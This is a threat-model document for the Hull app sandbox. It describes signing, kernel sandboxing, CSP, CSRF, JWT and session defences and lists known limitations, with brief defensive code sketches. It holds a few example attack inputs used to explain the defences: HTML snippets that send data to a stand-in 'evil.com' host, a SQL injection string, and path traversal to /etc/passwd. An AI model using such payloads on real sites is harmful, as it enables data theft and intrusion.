This document is brutally explicit about what Hull protects against, what it doesn't, and where trust anchors lie.
| Party | Controls | Must Trust |
|---|---|---|
| Platform publisher (gethull.dev) | Platform library, signing key, build service | Nothing (self-sovereign) |
| App developer | Application code, signing key, manifest | Platform publisher (or vendor their own) |
| End user | Which apps to run, which keys to trust | App developer + platform publisher |
| Third-party auditor | Nothing — read-only verification | Cryptographic math (Ed25519, SHA-256) |
The system is designed so that no party requires blind trust:
- Users can verify the platform (signature + canary + source audit)
- Users can verify the app (signature + file hashes + manifest inspection)
- Users can eliminate gethull.dev entirely (self-host, self-sign)
Three verification points, each catching different attack vectors:
| When | What | Tool | Checks |
|---|---|---|---|
| Before download | Inspect capabilities | `verify/index.html` (offline) | Platform sig, app sig, manifest, canary |
| Before install | Verify integrity | `hull verify --developer-key` (CLI) | Both sigs + file hashes |
| At startup | Runtime check | `--verify-sig` flag | App sig + file hashes, platform key pin |
Platform public key:
- Hardcoded in Hull CLI (`HL_PLATFORM_PUBKEY_HEX` in `signature.h`)
- Hardcoded in browser verifier (`GETHULL_DEV_PLATFORM_KEY` in `verify/index.html`)
- Published at `https://gethull.dev/.well-known/platform.pub`
- Overridable via `--platform-key <file>` for self-hosted platforms
Developer public key:
- Published in app repository (`.pub` file)
- Manually cross-referenced by user against trusted source
- Passed explicitly: `hull verify --developer-key dev.pub`
This is the primary threat model. Hull exists to make it possible to trust apps from unknown developers.
Attack: Ship a binary without the Hull platform (custom runtime, no sandbox)
- Prevention: Platform signature + canary. Browser verifier checks platform sig against pinned gethull.dev key. Canary scanner finds `HULL_PLATFORM_CANARY` in the binary and verifies its integrity hash against the signed value.
- Remaining risk: Developer could build a custom binary that includes the canary bytes at the right offset. Reproducible builds (Phase 9) close this gap entirely — a rebuild from source proves the binary is just "Hull platform + declared source."
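A minimal sketch of the canary scan in Python. The assumption that the integrity hash covers the bytes preceding the marker is purely illustrative; Hull's actual signed-canary layout may differ.

```python
import hashlib

CANARY = b"HULL_PLATFORM_CANARY"  # magic bytes the scanner searches for

def scan_canary(binary: bytes, signed_hash: str) -> bool:
    """Locate the canary marker and check an integrity hash against the
    value recorded in the signed payload. The 'hash covers everything
    before the marker' layout is an assumption for illustration."""
    offset = binary.find(CANARY)
    if offset == -1:
        return False  # no Hull platform marker embedded at all
    region_hash = hashlib.sha256(binary[:offset]).hexdigest()
    return region_hash == signed_hash
```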
Attack: Declare minimal manifest but access more at runtime
- Prevention: Manifest is signed in
package.sig. At runtime, pledge/unveil enforce the declared capabilities at the kernel level. Accessing undeclared paths triggers SIGKILL (Linux/Cosmo). - Remaining risk: macOS has no kernel sandbox — pledge/unveil are no-ops. C-level validation in capability functions is the only defense. A bug in
hl_cap_fs_validate()on macOS would allow bypass. Linux and Cosmopolitan are kernel-enforced.
Attack: Call app.manifest() again at runtime to escalate capabilities
- Prevention: Three independent barriers make this a non-issue:
  - One-shot enforcement: `app.manifest()` errors on second call in both Lua and JS runtimes. The first call writes to a registry key; any subsequent call raises a runtime error ("app.manifest() can only be called once").
  - Startup-only extraction: The manifest is read from the runtime into a C struct (`HlManifest`) once during startup (step 10 of the boot sequence). C-level capabilities (`rt->env_cfg`, `rt->http_cfg`, `rt->csp_policy`) are wired from this struct and never re-read from the runtime state.
  - Kernel seal: `unveil(NULL, NULL)` seals filesystem visibility and `pledge()` restricts syscall families. Both are one-way operations — the kernel refuses to add permissions after sealing, regardless of what the runtime state says.
- Even without the one-shot guard, a second `app.manifest()` call would only overwrite the Lua/JS registry key, with no effect on the already-wired C capabilities or the sealed kernel sandbox. The guard exists to make the immutability explicit and prevent developer confusion.
Attack: SQL injection through user input
- Prevention: All database access goes through `hl_cap_db_query()` / `hl_cap_db_exec()`, which use SQLite parameterized binding (`sqlite3_bind_*`). SQL is always a literal string from app code. No string concatenation, ever. SQL injection is structurally impossible.
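The structural guarantee can be illustrated with Python's stdlib `sqlite3`, which sits on the same `sqlite3_bind_*` machinery. This is a sketch, not Hull code.

```python
import sqlite3

def safe_query(conn: sqlite3.Connection, sql: str, params: tuple) -> list:
    """Capability-layer rule in miniature: the SQL text is a literal and
    user input travels only through bind parameters (sketch; the real
    hl_cap_db_query() is C over the same binding API)."""
    return conn.execute(sql, params).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES (?)", ("alice",))
# An injection payload is just an inert string value, never SQL:
injected = safe_query(conn, "SELECT name FROM users WHERE name = ?",
                      ("alice' OR '1'='1",))
```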
Attack: Path traversal to read /etc/passwd
- Prevention: `hl_cap_fs_validate()` rejects:
  - Absolute paths (starts with `/`)
  - `..` components
  - Any path that resolves outside the app's base directory via `realpath()` ancestor check
  - Symlink escapes (realpath resolves symlinks before checking)
- Kernel `unveil()` also blocks access to undeclared paths.
Attack: Memory exhaustion / DoS via infinite allocation
- Prevention:
  - Lua: Custom allocator enforces 64 MB heap limit. Exceeding → NULL allocation → script error, not crash.
  - QuickJS: `JS_SetMemoryLimit()` enforces 64 MB. Exceeding → allocation failure → JS exception.
Attack: Infinite loop / CPU exhaustion
- Prevention:
  - QuickJS: Instruction-count interrupt handler. Configurable `max_instructions` limit. Exceeding → JS exception.
  - Lua: Memory limit eventually triggers (loops allocate stack frames). Less precise than instruction counting.
Attack: Exfiltrate data to unauthorized hosts
- Prevention: `hl_cap_http_request()` validates the target host against the manifest's `hosts` allowlist. Only declared hosts are reachable. Kernel pledge includes `inet` + `dns` only if hosts are declared.
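Both rules can be sketched in a few lines of Python. This is illustrative only; the real host validation and pledge-promise assembly happen in C, and normalization details may differ.

```python
def host_allowed(url_host: str, manifest_hosts: list[str]) -> bool:
    """Exact-match allowlist check in the spirit of hl_cap_http_request()."""
    return url_host.lower() in {h.lower() for h in manifest_hosts}

def pledge_promises(manifest_hosts: list[str]) -> str:
    """Promise-set sketch: inet + dns are granted only when the
    manifest declares hosts, per the behavior described above."""
    base = "stdio rpath wpath cpath flock"
    return base + " inet dns" if manifest_hosts else base
```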
Attack: Read environment variables (API keys, secrets)
- Prevention: `hl_cap_env_get()` checks against the manifest's `env` allowlist (max 32 entries). Undeclared variables return NULL.
Attack: Cross-site scripting (XSS) via template output
- Prevention: Two layers of defense:
  - Template auto-escaping: Hull's template engine (`hull.template`) HTML-escapes all `{{ }}` output by default. The five dangerous characters (`& < > " '`) are replaced with HTML entities. This prevents reflected and stored XSS from user-controlled data rendered into HTML templates.
  - Content-Security-Policy (CSP): Hull injects a strict CSP header on every `res:html()` / `res.html()` response by default: `default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; form-action 'self'; frame-ancestors 'none'`. This blocks inline scripts, external script loads, `eval()`, object embeds, and iframe embedding — even if an attacker bypasses template escaping, the browser refuses to execute injected scripts.
- Remaining risk: Raw output (`{{{ }}}`) and the `| raw` filter bypass escaping. Developers must only use raw output with trusted content. Templates don't escape for JavaScript string contexts (e.g. inline `<script>` blocks) — use `{{ var | json }}` to safely embed data in JS contexts. Apps that require client-side JavaScript must customize the CSP (e.g. `app.manifest({ csp = "default-src 'self'; script-src 'self'" })`).
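The five-character escaping rule is small enough to show directly. This is a Python sketch of the behavior described above, not Hull's actual template engine.

```python
# The five-character escape table applied to {{ }} output.
_ESCAPES = {"&": "&amp;", "<": "&lt;", ">": "&gt;",
            '"': "&quot;", "'": "&#39;"}

def html_escape(value: str) -> str:
    """Per-character replacement, so '&' is never double-escaped."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)
```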
Attack: Clickjacking — embedding the app in a malicious iframe
- Prevention: The default CSP includes `frame-ancestors 'none'`, which instructs the browser to refuse rendering the page inside any `<iframe>`, `<frame>`, or `<object>` tag. This prevents UI redress attacks where a malicious site overlays invisible frames over the app to trick users into clicking hidden elements.
- Actor: Any third-party website operator. Does not require compromising the app — just embedding it.
Attack: MIME type confusion / content sniffing
- Prevention: The default CSP's `default-src 'none'` prevents the browser from loading any sub-resources (scripts, stylesheets, fonts, media) that an attacker might inject via reflected content. Combined with `Content-Type: text/html; charset=utf-8` set by `res:html()`, the browser cannot misinterpret response content.
- Actor: Network MITM or injection via stored user content.
Attack: Template injection (server-side template injection / SSTI)
- Prevention: Template compilation uses `luaL_loadbuffer` / `JS_Eval` in the C bridge, which is only callable from embedded stdlib code (not user application code). The code generator produces deterministic output from the AST — user data is never interpolated into the generated source code. User data flows through the `__d` (data) parameter at render time, not at compile time. There is no `eval()` or `load()` in the sandboxed runtimes.
Attack: Session hijacking via cookie theft
- Prevention: `hull.cookie` defaults to `HttpOnly=true`, `Secure=true`, `SameSite=Lax`. HttpOnly prevents JavaScript access (XSS-based theft). Secure prevents plaintext transmission. SameSite=Lax blocks cross-origin POST requests from carrying session cookies.
- Remaining risk: Same-origin XSS can still read `req.ctx.session` data. Hull's template engine (`hull.template`) auto-escapes all `{{ }}` output by default (`& < > " '` → HTML entities), which prevents most reflected and stored XSS vectors. Raw output via `{{{ }}}` or the `| raw` filter bypasses escaping and should only be used with trusted content.
Attack: CSRF — forged state-changing requests from another origin
- Prevention: `hull.middleware.csrf` middleware generates HMAC-based tokens tied to the session ID and timestamp. State-changing methods (POST/PUT/DELETE/PATCH) require a valid CSRF token in the `X-CSRF-Token` header or `_csrf` form field. Tokens expire (default 1h). Safe methods (GET/HEAD/OPTIONS) are automatically skipped. Constant-time comparison prevents timing attacks.
- Remaining risk: If the CSRF secret is leaked, tokens can be forged. The secret must be stored securely (e.g., `env.get("SECRET_KEY")`).
Attack: JWT token forgery
- Prevention: `hull.jwt` uses HS256 with HMAC-SHA256 (no "none" algorithm, no algorithm negotiation). Signature verification uses constant-time comparison. Expired tokens are rejected.
- Remaining risk: JWT secrets must be strong. JWTs are stateless — they cannot be revoked until they expire. For revocation, use sessions instead.
Attack: Session fixation / brute-force session IDs
- Prevention: `hull.middleware.session` generates 32 random bytes (256-bit entropy) via `crypto.random()` for session IDs. IDs are hex-encoded (64 chars). Sessions are server-side (SQLite) with sliding expiry. Expired sessions are automatically pruned.
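The ID generation is a one-liner with a CSPRNG. This Python sketch uses `secrets` as a stand-in for `crypto.random()`.

```python
import secrets

def new_session_id() -> str:
    """256-bit session ID, hex-encoded to 64 chars, mirroring the
    generation described above (sketch, not Hull's implementation)."""
    return secrets.token_bytes(32).hex()
```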
Hull injects security headers automatically at the C level to provide defense in depth:
Content-Security-Policy (CSP):
Default policy (applied to all res:html() / res.html() responses):
`default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; form-action 'self'; frame-ancestors 'none'`
| Directive | Value | Blocks |
|---|---|---|
| `default-src` | `'none'` | All resource types not explicitly allowed (scripts, fonts, media, objects, workers, WebSockets) |
| `style-src` | `'unsafe-inline'` | External stylesheets (inline styles allowed for SSR convenience) |
| `img-src` | `'self'` | Images from external origins |
| `form-action` | `'self'` | Form submissions to external origins (data exfiltration via `<form action="evil.com">`) |
| `frame-ancestors` | `'none'` | Embedding in iframes on any origin (clickjacking) |
What the default CSP mitigates:
| Attack | Actor | How CSP Blocks It |
|---|---|---|
| Reflected XSS (injected `<script>`) | Any user who can craft a malicious URL | `default-src 'none'` blocks inline script execution |
| Stored XSS (persisted `<script>`) | Authenticated user who stores malicious content | `default-src 'none'` blocks inline script execution |
| External script injection (`<script src="evil.js">`) | Attacker who bypasses template escaping | `default-src 'none'` blocks all external script loads |
| `eval()`-based XSS | Attacker who injects data into JS eval context | `default-src 'none'` implicitly disables `eval()` and `Function()` |
| Clickjacking (iframe embedding) | Any third-party site operator | `frame-ancestors 'none'` refuses rendering in iframes |
| Form action hijacking | Attacker who injects `<form action="evil.com">` | `form-action 'self'` restricts form targets to same origin |
| Data exfiltration via `<img src="evil.com/steal?data=...">` | Attacker with XSS who tries to leak data via image tags | `img-src 'self'` blocks images from external origins |
| Keylogging via injected external JS | Attacker who loads a remote keylogger script | `default-src 'none'` blocks all external resource loads |
CSP configuration:
| Manifest | Behavior |
|---|---|
| No `app.manifest()` | Default strict CSP (defense in depth) |
| `app.manifest({})` | Default strict CSP |
| `app.manifest({ csp = "custom..." })` | Custom CSP string |
| `app.manifest({ csp = false })` | CSP disabled (opt-out) |
Where CSP is injected: At the C level in `lua_res_html()` and `js_res_html()`, not in application code. This means the CSP cannot be forgotten, bypassed, or misconfigured by app developers — it's structural, like parameterized SQL. Only `res:json()` and `res:text()` skip CSP (non-HTML content types are not vulnerable to script injection).
Attack: Replace binary on CDN with modified version
- Prevention: `binary_hash` in `package.sig` is signed by the developer's Ed25519 key. Changed binary → hash mismatch. Browser verifier catches this immediately when binary is uploaded.
Attack: Replace package.sig with forged one
- Prevention: Signature is Ed25519 over the canonical payload. Forging requires the developer's 32-byte private key. Ed25519 is considered secure against all known attacks.
Attack: Replace both binary and package.sig
- Prevention: User verifies the developer's public key against a trusted source (e.g., GitHub repo, personal website). If the attacker doesn't have the developer's private key, they can't produce a valid signature for any payload.
Attack: Replace platform libraries in a self-hosted Hull
- Prevention: Platform signature in `package.sig` is verified against the pinned gethull.dev key. Swapped platform → platform signature mismatch.
Attack: Ship malicious platform libraries
- Prevention: Platform signing key is published. Users can:
  - Audit Hull source (AGPL-3.0)
  - Build their own platform: `make platform`
  - Sign with own key: `hull sign-platform mykey`
  - Pin their own key in apps
The architecture is designed so you don't have to trust gethull.dev.
Attack: Backdoor the build service
- Prevention: Reproducible builds. Anyone can rebuild from source with the recorded `cc_version` + `flags` and compare `binary_hash`. The build service is a convenience, not a trust requirement.
Complete trust elimination path:
- Download Hull source from GitHub (AGPL-3.0)
- Audit the code
- Build platform yourself: `make platform`
- Sign with your own key: `hull sign-platform mykey`
- Distribute to customers with your key pinned
- Customers verify against YOUR key, not gethull.dev's
Trust chain: Customer → You (platform builder) → App developer. gethull.dev is completely out of the picture.
| Mechanism | Implementation | Violation |
|---|---|---|
| Syscall filter | seccomp-bpf via jart/pledge | SIGKILL (unbypassable, kernel-enforced) |
| Filesystem restriction | Landlock via jart/pledge | EACCES or SIGKILL |
| Mode | `__pledge_mode = KILL_PROCESS \| STDERR_LOGGING` | Process killed + diagnostic to stderr |
Allowed pledge promises: `stdio inet rpath wpath cpath flock dns` (`dns` only if hosts declared)
CVE classes prevented:
- Arbitrary file access outside declared paths
- Privilege escalation via undeclared syscalls
- Shell escape / command injection (no `exec` pledge)
- Network exfiltration to undeclared hosts
- Device access, mount, ptrace, raw sockets
| Mechanism | Implementation | Violation |
|---|---|---|
| Syscall filter | Native pledge() in cosmocc libc | SIGKILL |
| Filesystem restriction | Native unveil() | ENOENT |
| Static binary | No dynamic linking | N/A |
Additional protections:
- Works on Linux, FreeBSD, OpenBSD, Windows (via NT security)
- No dynamic linking → no LD_PRELOAD attacks
- No DLL injection
- No dynamic linker attacks
- W^X enforcement by Cosmopolitan runtime
| Mechanism | Implementation | Violation |
|---|---|---|
| Kernel sandbox | Not available | N/A |
| C-level validation | Capability functions | Returns error |
Active defenses:
- `hl_cap_fs_validate()` rejects path traversal
- `hl_cap_env_get()` enforces allowlist
- `hl_cap_db_query()` uses parameterized binding
- `hl_cap_http_request()` validates host allowlist
Honest limitation: If a bug exists in the C validation layer, macOS has no kernel backup. A vulnerability in `hl_cap_fs_validate()` would allow filesystem access. On Linux/Cosmo, the kernel catches it anyway. This is a known, documented limitation.
The manifest is the app's declared behavior contract:
```lua
app.manifest({
  fs = { read = {"data/"}, write = {"data/uploads/"} },
  env = {"PORT", "DATABASE_URL", "API_KEY"},
  hosts = {"api.stripe.com", "hooks.slack.com"}
})
```

What this tells an auditor:
- This app reads from `data/`, writes to `data/uploads/`
- It reads 3 environment variables
- It makes HTTP calls to Stripe and Slack only
- It has NO other filesystem, environment, or network access
How the system enforces it:
| Level | Enforcement | Bypass |
|---|---|---|
| Kernel | unveil() seals filesystem to declared paths | SIGKILL on violation (Linux/Cosmo) |
| Kernel | pledge() restricts to declared syscall families | SIGKILL on violation (Linux/Cosmo) |
| C | Every capability function validates against manifest | Returns error on violation |
| Signature | Manifest is signed — tampering invalidates signature | Ed25519 forgery required |
No manifest declared? Even if the app doesn't call `app.manifest()`, the default-deny posture is identical to `app.manifest({})`:
- Kernel sandbox is applied — pledge/unveil restrict to only the database file and TLS paths
- CSP is active — the default strict policy is injected on all HTML responses
- C-level capabilities deny all — env returns NULL, HTTP requests fail, filesystem operations fail
- Signature still covers the absence of manifest (`"manifest": null`)
All example apps declare `app.manifest()` explicitly, even when the empty `{}` is sufficient, as a best practice.
- Self-contained HTML file, zero server dependencies
- Runs entirely in browser — no data sent anywhere
- Inlined tweetnacl-js (public domain) for Ed25519
- Web Crypto API for SHA-256
- CSP: `default-src 'none'` — no network except optional key fetch via `connect-src https:`
- gethull.dev platform key hardcoded — auto-verifies against known key
- Canary scanner: searches uploaded binary for `HULL_PLATFORM_CANARY` magic bytes
Checks performed:
- Platform signature validity (Ed25519)
- Platform key match against pinned gethull.dev key
- App signature validity (Ed25519)
- Developer key match (if provided)
- Binary hash match (if binary uploaded)
- Platform canary presence + integrity (if binary uploaded)
- Source file hash verification (if files uploaded)
- Manifest capability display with risk levels
```
hull verify [--platform-key <file|url>] [--developer-key <file|url>] [app_dir]
```
- Reads `package.sig` (or `hull.sig` for backwards compat)
- Verifies platform layer Ed25519 signature
- Verifies app layer Ed25519 signature
- Recomputes SHA-256 of all declared files
- Reports mismatches, missing files, key mismatches
- Exit code 0 = all checks passed, 1 = failure
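The hash-recomputation step can be sketched in Python. The `declared` dict mapping relative paths to hex digests is an assumed layout for illustration, not `package.sig`'s real schema.

```python
import hashlib, os

def verify_file_hashes(app_dir: str, declared: dict[str, str]) -> list[str]:
    """Recompute SHA-256 for every declared file and report mismatches
    and missing files, in the spirit of `hull verify` (sketch).
    An empty result corresponds to exit code 0."""
    failures = []
    for rel_path, expected in declared.items():
        path = os.path.join(app_dir, rel_path)
        if not os.path.exists(path):
            failures.append(f"missing: {rel_path}")
            continue
        with open(path, "rb") as f:
            actual = hashlib.sha256(f.read()).hexdigest()
        if actual != expected:
            failures.append(f"hash mismatch: {rel_path}")
    return failures
```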
```
./myapp --verify-sig dev.pub
```
- Checks on every startup before accepting connections
- Platform key pinned at compile time (`HL_PLATFORM_PUBKEY_HEX`)
- Verifies both signature layers
- Verifies file hashes against embedded entries via VFS (O(log n) lookup)
- Refuses to start if any check fails
Service: `api.gethull.dev/ci/v1`
- Developer pushes source to GitHub
- CI calls `api.gethull.dev/ci/v1/build`
- Service rebuilds with exact `cc_version` + `flags` from `package.sig`
- Compares `binary_hash`
- If match → issues "Reproducible Build Verified" attestation
- Attestation is an Ed25519 signature over `{binary_hash, timestamp, builder_version}`
A passing reproducible build check proves the developer could not have injected custom native code. The binary is provably just "Hull platform + declared source files."
- App developers cannot write C — only Lua/JS source
- Platform binary is hash-pinned — `platform.sig` locks exact bytes
- Trampoline (`app_main.c`) is deterministic — generated from template
- Cosmopolitan produces deterministic output — static linking, no timestamps
- Build metadata is signed — `cc_version` + `flags` attested by developer
Run your own rebuild service. Pin your own platform key. Your customers trust you, not gethull.dev.
The Keel HTTP server library (vendored at `vendor/keel/`) has been audited for memory safety, input validation, resource management, and network security. Full report: `keel_audit.md`.
Key findings relevant to security:
| Severity | Issue | Impact |
|---|---|---|
| Critical | kqueue `kl_event_mod` doesn't handle `READ\|WRITE` bitmask | HTTP/2 write starvation on macOS |
| Critical | WebSocket `ws_send_frame` partial writes | Frame corruption on non-blocking sockets |
| High | HTTP/2 and WebSocket 101 upgrade partial writes | Protocol stream corruption |
| High | TLS private key material not zeroed before free | Key residue in heap memory |
| Informational | Request smuggling mitigation present | `Transfer-Encoding: chunked` zeroes Content-Length (RFC 7230 §3.3.3) |
| Informational | Header injection guard present | `contains_crlf()` rejects `\r`/`\n` in header names/values |
Build hardening verified:
- `-Wall -Wextra -Wpedantic -Wshadow -Wformat=2 -Werror` in production
- `-fstack-protector-strong` (non-Cosmopolitan builds)
- ASan + UBSan debug build (`make debug`)
- Two libFuzzer targets (HTTP parser + multipart parser)
- 229 unit tests across 13 suites
These are real, not theoretical:
| Limitation | Impact | Mitigation |
|---|---|---|
| macOS has no kernel sandbox | C-level validation bugs allow bypass | Use Linux or Cosmo for production |
| Lua lacks instruction-count metering | Infinite loops are only caught by memory limit | QuickJS has precise gas metering |
| Canary is not foolproof | Attacker could embed magic bytes in custom binary | Reproducible builds (Phase 9) eliminate this |
| `realpath()` is TOCTOU | Race between check and use | Kernel unveil prevents actual access |
| Default CSP blocks client-side JS | Apps needing fetch/AJAX must customize CSP | app.manifest({ csp = "default-src 'self'; connect-src 'self'" }) |
| 32-entry limit per manifest category | Large apps may hit ceiling | Sufficient for most production apps |
| `req.ctx` uses raw malloc (not tracked) | ctx JSON bypasses runtime memory limits | Capped at 64KB; bounded by runtime heap indirectly |
| HMAC-SHA256 binding returns hex string | Callers must use constant-time comparison | hull.jwt and hull.middleware.csrf stdlib use constant-time internally |